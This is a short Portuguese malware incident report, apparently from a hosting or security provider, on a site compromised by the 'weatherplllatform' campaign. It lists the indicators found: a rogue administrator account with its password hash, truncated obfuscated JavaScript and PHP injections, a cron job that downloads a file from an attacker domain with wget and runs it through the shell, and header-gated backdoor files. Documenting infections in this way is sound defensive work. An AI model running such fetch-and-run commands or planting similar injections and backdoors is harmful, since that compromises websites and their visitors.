Um dos nossos clientes foi afetado pelo malware weatherplllatform, neste caso scripts.weatherplllatform e descobrimos o seguinte:
Utilizador malicioso com privilégios administrativos
itsme','$P$BqPKFgMTAdxmIvuLuC8iBtt2okVOLY/','itsme','[email protected]','','2020-04-21 06:42:46','',0,'itsme
Ficheiros javascript com código injetado
eval(String.fromCharCode(118,97,….,32,125/spectrepoint/));
Ficheiros PHP com código malicioso injetado
?php $PDvCBkdAp='y(3;]whcx)8$4mb dk1qog5sprlua
Cronjobs com execução xxxd
wget -q -O xxxd http://hello.hellodolly777.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/…/public_html 24 && rm -f xxxd
Ficheiros espalhados por vários locais com acesso por
if (isset($_HEADERS['Authorization']))